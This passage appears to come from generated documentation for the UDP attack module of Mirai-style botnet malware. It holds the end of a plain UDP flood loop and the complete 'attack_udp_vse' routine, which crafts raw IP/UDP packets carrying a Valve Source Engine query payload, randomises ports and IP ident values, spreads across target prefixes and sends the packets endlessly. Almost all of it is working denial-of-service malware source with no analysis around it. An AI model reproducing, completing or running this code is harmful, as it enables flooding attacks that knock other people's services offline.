         if (dport == 0xffff)
             targs[i].sock_addr.sin_port = rand_next();
         else
             targs[i].sock_addr.sin_port = htons(dport);
         if ((fds[i] = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP)) == -1)
         {
 #ifdef DEBUG
             printf("Failed to create udp socket. Aborting attack\n");
 #endif
             return;
         }
         bind_addr.sin_family = AF_INET;
         bind_addr.sin_port = sport;
         bind_addr.sin_addr.s_addr = 0;
         if (bind(fds[i], (struct sockaddr *)&bind_addr, sizeof (struct sockaddr_in)) == -1)
         {
 #ifdef DEBUG
             printf("Failed to bind udp socket.\n");
 #endif
         }
         // For prefix attacks
         if (targs[i].netmask < 32)
             targs[i].sock_addr.sin_addr.s_addr = htonl(ntohl(targs[i].addr) + (((uint32_t)rand_next()) >> targs[i].netmask));
         if (connect(fds[i], (struct sockaddr *)&targs[i].sock_addr, sizeof (struct sockaddr_in)) == -1)
         {
 #ifdef DEBUG
             printf("Failed to connect udp socket.\n");
 #endif
         }
     }
 #ifdef DEBUG
     printf("after setup\n");
 #endif
     while (TRUE)
     {
         for (i = 0; i < targs_len; i++)
         {
             char *data = pkts[i];
             // Randomize packet content?
             if (data_rand)
                 rand_str(data, data_len);
 #ifdef DEBUG
             errno = 0;
             if (send(fds[i], data, data_len, MSG_NOSIGNAL) == -1)
             {
                 printf("send failed: %d\n", errno);
             } else {
                 printf(".\n");
             }
 #else
             send(fds[i], data, data_len, MSG_NOSIGNAL);
 #endif
         }
 #ifdef DEBUG
             break;
             if (errno != 0)
                 printf("errno = %d\n", errno);
 #endif
     }
 }
void attack_udp_vse (uint8_t , struct attack_target * , uint8_t , struct attack_option *)
Definition at line 129 of file attack_udp.c.
References attack_target::addr, ATK_OPT_DPORT, ATK_OPT_IP_DF, ATK_OPT_IP_IDENT, ATK_OPT_IP_TOS, ATK_OPT_IP_TTL, ATK_OPT_SPORT, attack_get_opt_int(), checksum_generic(), checksum_tcpudp(), close, FALSE, LOCAL_ADDR, rand_next(), attack_target::sock_addr, socket, TABLE_ATK_VSE, table_retrieve_val(), table_unlock_val(), TRUE, and util_memcpy().
Referenced by attack_init().
 {
     int i, fd;
     char **pkts = calloc(targs_len, sizeof (char *));
     uint8_t ip_tos = attack_get_opt_int(opts_len, opts, ATK_OPT_IP_TOS, 0);
     uint16_t ip_ident = attack_get_opt_int(opts_len, opts, ATK_OPT_IP_IDENT, 0xffff);
     uint8_t ip_ttl = attack_get_opt_int(opts_len, opts, ATK_OPT_IP_TTL, 64);
     BOOL dont_frag = attack_get_opt_int(opts_len, opts, ATK_OPT_IP_DF, FALSE);
     port_t sport = attack_get_opt_int(opts_len, opts, ATK_OPT_SPORT, 0xffff);
     port_t dport = attack_get_opt_int(opts_len, opts, ATK_OPT_DPORT, 27015);
     char *vse_payload;
     int vse_payload_len;
     table_unlock_val(TABLE_ATK_VSE);
     vse_payload = table_retrieve_val(TABLE_ATK_VSE, &vse_payload_len);
     if ((fd = socket(AF_INET, SOCK_RAW, IPPROTO_UDP)) == -1)
     {
 #ifdef DEBUG
         printf("Failed to create raw socket. Aborting attack\n");
 #endif
         return;
     }
     i = 1;
     if (setsockopt(fd, IPPROTO_IP, IP_HDRINCL, &i, sizeof (int)) == -1)
     {
 #ifdef DEBUG
         printf("Failed to set IP_HDRINCL. Aborting\n");
 #endif
         close(fd);
         return;
     }
     for (i = 0; i < targs_len; i++)
     {
         struct iphdr *iph;
         struct udphdr *udph;
         char *data;
         pkts[i] = calloc(128, sizeof (char));
         iph = (struct iphdr *)pkts[i];
         udph = (struct udphdr *)(iph + 1);
         data = (char *)(udph + 1);
         iph->version = 4;
         iph->ihl = 5;
         iph->tos = ip_tos;
         iph->tot_len = htons(sizeof (struct iphdr) + sizeof (struct udphdr) + sizeof (uint32_t) + vse_payload_len);
         iph->id = htons(ip_ident);
         iph->ttl = ip_ttl;
         if (dont_frag)
             iph->frag_off = htons(1 << 14);
         iph->protocol = IPPROTO_UDP;
         iph->saddr = LOCAL_ADDR;
         iph->daddr = targs[i].addr;
         udph->source = htons(sport);
         udph->dest = htons(dport);
         udph->len = htons(sizeof (struct udphdr) + 4 + vse_payload_len);
         *((uint32_t *)data) = 0xffffffff;
         data += sizeof (uint32_t);
         util_memcpy(data, vse_payload, vse_payload_len);
     }
     while (TRUE)
     {
         for (i = 0; i < targs_len; i++)
         {
             char *pkt = pkts[i];
             struct iphdr *iph = (struct iphdr *)pkt;
             struct udphdr *udph = (struct udphdr *)(iph + 1);
             // For prefix attacks
             if (targs[i].netmask < 32)
                 iph->daddr = htonl(ntohl(targs[i].addr) + (((uint32_t)rand_next()) >> targs[i].netmask));
             if (ip_ident == 0xffff)
                 iph->id = (uint16_t)rand_next();
             if (sport == 0xffff)
                 udph->source = rand_next();
             if (dport == 0xffff)
                 udph->dest = rand_next();
             iph->check = 0;
             iph->check = checksum_generic((uint16_t *)iph, sizeof (struct iphdr));
             udph->check = 0;
             udph->check = checksum_tcpudp(iph, udph, udph->len, sizeof (struct udphdr) + sizeof (uint32_t) + vse_payload_len);
             targs[i].sock_addr.sin_port = udph->dest;
             sendto(fd, pkt, sizeof (struct iphdr) + sizeof (struct udphdr) + sizeof (uint32_t) + vse_payload_len, MSG_NOSIGNAL, (struct sockaddr *)&targs[i].sock_addr, sizeof (struct sockaddr_in));
         }
 #ifdef DEBUG
             break;
             if (errno != 0)
                 printf("errno = %d\n", errno);
 #endif
     }
 }
static void free_opts (struct attack_option * , int) static
Variable Documentation
struct attack_target __attribute__